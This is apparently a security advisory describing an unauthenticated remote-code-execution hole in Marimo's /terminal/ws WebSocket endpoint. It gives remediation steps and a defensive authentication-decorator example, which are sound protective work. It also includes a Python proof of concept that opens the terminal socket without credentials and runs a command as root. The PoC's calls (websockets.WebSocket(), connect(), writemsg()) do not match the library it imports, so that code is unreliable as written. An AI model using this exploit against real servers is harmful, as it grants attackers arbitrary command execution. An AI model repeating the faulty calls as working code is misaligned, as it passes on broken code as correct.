### Key Vulnerability Summary

**Vulnerability Overview**

The `/terminal/ws` terminal WebSocket endpoint in Marimo contains a pre-authentication Remote Code Execution (RCE) vulnerability. This endpoint lacks authentication validation, allowing unauthenticated attackers to connect directly and obtain a full PTY shell, thereby executing arbitrary system commands on the server. Unlike other WebSocket endpoints, this endpoint only checks the running mode and completely bypasses the authentication step.

**Scope of Impact**

* **Affected Versions**: Marimo <= 0.20.4
* **CVE ID**: CVE-2025-39587

**Remediation**

1. Add authentication validation to the `/terminal/ws` endpoint to align it with the `/ws` endpoint (using `WebSocketConnectionValidator.validate_auth()`).
2. Apply a unified authentication decorator or middleware interceptor to all WebSocket endpoints.
3. The terminal functionality should only be available when explicitly enabled, rather than being enabled by default.

**Proof of Concept (PoC) Code**

```python
import websockets
import time

# Connect without any authentication
ws = websockets.WebSocket()
ws.connect('ws://TARGET:2718/terminal/ws')
time.sleep(2)

# Drain initial output
try:
    while True:
        ws.writemsg(1)
        ws.recv()
except:
    pass

# Execute arbitrary command
ws.writemsg(10)
ws.send('id\n')
time.sleep(2)
print(ws.recv())  # uid=0(root) gid=0(root) groups=0(root)
ws.close()
```
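The three remediation points above share one root cause: each WebSocket handler decides for itself whether to authenticate, so one handler can skip the step. The following is an added example, not Marimo's code, of the "unified decorator" fix: a single `ws_guard` gate that every WebSocket handler must pass through, performing the auth check first, then the mode check, then a feature check that keeps the terminal off unless explicitly enabled. `ServerConfig`, `WsConnection`, `validate_auth`, the `access_token` query parameter and the route table are all hypothetical stand-ins for the real server objects.

```python
"""Added example (not marimo's code): one authorization gate for every
WebSocket handler, so no endpoint can reach accept() without auth."""
import hmac
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional


@dataclass
class ServerConfig:  # hypothetical server state
    auth_token: str
    mode: str = "edit"              # "edit" or "run"
    terminal_enabled: bool = False  # off by default (remediation point 3)


@dataclass
class WsConnection:  # hypothetical stand-in for a framework WebSocket object
    path: str
    query: Dict[str, str] = field(default_factory=dict)
    accepted: bool = False
    close_reason: Optional[str] = None

    def accept(self) -> None:
        self.accepted = True

    def close(self, reason: str) -> None:
        self.close_reason = reason


def validate_auth(conn: WsConnection, cfg: ServerConfig) -> bool:
    """Constant-time comparison of the presented token with the server's."""
    return hmac.compare_digest(conn.query.get("access_token", ""), cfg.auth_token)


def ws_guard(required_mode: Optional[str] = None, feature: Optional[str] = None):
    """Decorator applied to ALL WebSocket handlers: auth, then mode, then feature."""
    def wrap(handler: Callable[[WsConnection, ServerConfig], bool]):
        def guarded(conn: WsConnection, cfg: ServerConfig) -> bool:
            if not validate_auth(conn, cfg):          # the step /terminal/ws skipped
                conn.close("unauthorized")
                return False
            if required_mode is not None and cfg.mode != required_mode:
                conn.close("wrong mode")              # the only check it had before
                return False
            if feature == "terminal" and not cfg.terminal_enabled:
                conn.close("terminal disabled")       # opt-in, not default-on
                return False
            return handler(conn, cfg)
        return guarded
    return wrap


@ws_guard()
def kernel_ws(conn: WsConnection, cfg: ServerConfig) -> bool:
    conn.accept()
    return True


@ws_guard(required_mode="edit", feature="terminal")
def terminal_ws(conn: WsConnection, cfg: ServerConfig) -> bool:
    conn.accept()  # only reachable after every gate check passed
    return True


ROUTES = {"/ws": kernel_ws, "/terminal/ws": terminal_ws}  # hypothetical route table


def dispatch(conn: WsConnection, cfg: ServerConfig) -> bool:
    """Route a new WebSocket connection; returns True only if it was accepted."""
    return ROUTES[conn.path](conn, cfg)
```

Because the gate runs before `accept()`, an unauthenticated client never reaches the PTY no matter which route it picks, and a forgotten check on a future endpoint shows up as a missing decorator rather than a missing `if`.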